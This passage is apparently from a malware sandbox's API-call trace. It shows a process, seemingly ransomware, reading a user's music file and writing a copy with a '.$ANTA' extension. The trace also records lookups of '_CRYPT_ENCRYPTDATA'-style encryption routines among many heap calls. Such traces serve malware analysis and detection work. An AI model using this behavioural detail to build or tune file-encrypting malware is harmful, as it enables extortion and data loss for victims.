(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0111.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0111.690] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0111.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0111.690] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\bg_rcfis42y.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0111.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0111.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0111.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0111.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0111.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0111.694] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0111.694] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0111.697] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x430, lpOverlapped=0x0) returned 1 [0111.697] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0111.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10430) returned 0x4516010 [0111.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10430) returned 0x4526448 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0111.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.700] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10430) returned 0x4516010 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.701] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0111.701] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0111.701] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0111.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10430) returned 0x4516010 [0111.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10430) returned 0x4536880 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0111.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0111.703] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0111.703] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0111.703] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0111.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0111.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0111.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0111.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0111.704] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0111.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0111.705] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0111.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: 